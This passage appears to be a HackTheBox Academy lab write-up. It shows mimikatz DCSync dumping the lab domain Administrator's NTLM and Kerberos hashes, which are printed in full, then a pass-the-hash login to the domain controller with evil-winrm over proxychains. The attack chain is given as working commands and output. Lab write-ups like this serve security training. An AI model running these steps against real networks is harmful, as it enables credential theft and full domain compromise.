PSC:\Users\tpetty>.\mimikatz.exe.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )## \ / ## > http://blog.gentilkiwi.com/mimikatz'## v ##'VincentLETOUX(vincent.letoux@gmail.com)'#####'>http://pingcastle.com/http://mysmartlogon.com***/mimikatz#
Once mimikatz is running, you should see mimikatz # then run privilege::debug
mimikatz# privilege::debugERRORkuhl_m_privilege_simple;RtlAdjustPrivilege(20)c0000061
The run lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator to get domain Admin hash
mimikatz# lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator[DC]'INLANEFREIGHT.LOCAL'willbethedomain[DC]'DC01.INLANEFREIGHT.LOCAL'willbetheDCserver[DC]'INLANEFREIGHT\administrator'willbetheuseraccountObjectRDN:Administrator**SAMACCOUNT**SAMUsername:AdministratorAccountType:30000000(USER_OBJECT)UserAccountControl:00000200(NORMAL_ACCOUNT)Accountexpiration:Passwordlastchange:4/11/20229:24:49PMObjectSecurityID:S-1-5-21-2270287766-1317258649-2146029398-500ObjectRelativeID:500Credentials:HashNTLM:27dedb1dab4d8545c6e1c66fba077da0ntlm-0:27dedb1dab4d8545c6e1c66fba077da0ntlm-1:bdaffbfe64f1fc646a3353be1c2c3c99lm-0:757743529af55e110994f3c7e3710fc9SupplementalCredentials:*Primary:NTLM-Strong-NTOWF*RandomValue:b8bcb44123b3cc3bff20c663f1e0b94d*Primary:Kerberos-Newer-Keys*DefaultSalt:INLANEFREIGHT.LOCALAdministratorDefaultIterations:4096Credentialsaes256_hmac(4096):a76102a5617bffb1ea84ba0052767992823fd414697e81151f7de21bb41b1857aes128_hmac(4096):69e27df2550c5c270eca1d8ce5c46230des_cbc_md5(4096):c2d9c892f2e6f2dcOldCredentialsaes256_hmac(4096):51d2b5ce03d6ea2e75e69050f32b927d0e602c2806dcb0d1dd0aacdda619a510aes128_hmac(4096):b93da9262f5ce0ed724ce0177366bc8ades_cbc_md5(4096):0876d604a7087cf7OlderCredentialsaes256_hmac(4096):23cbc0dad348bebcbdbb4c82e9b23af299e8b56de358bafe24f2235f34497e4aaes128_hmac(4096):e35eb565af30c8ed79df5d8875508df6des_cbc_md5(4096):4904021983252cd5*Primary:Kerberos*DefaultSalt:INLANEFREIGHT.LOCALAdministratorCredentialsdes_cbc_md5:c2d9c892f2e6f2dcOldCredentialsdes_cbc_md5:0876d604a7087cf7
Now we have Domain Admin hash, I tried cracking the hash but no luck so I decided to pass the hash using evil-winrm to log in to DC:
─[eu-academy-1]─[10.10.14.30]─[htb-ac-2510340@htb-hnkzcchgmi]─[~]
└──╼ [★]$ proxychains evil-winrm -i 172.16.6.3 -u Administrator -H 27dedb1dab4d8545c6e1c66fba077da0
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.3:5985 ... OK
PS C:\Users\Administrator\Desktop> whoami
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.3:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.3:5985 ... OK
inlanefreight\administrator
dc
Game Over.... Domain admin compromised!!!!!!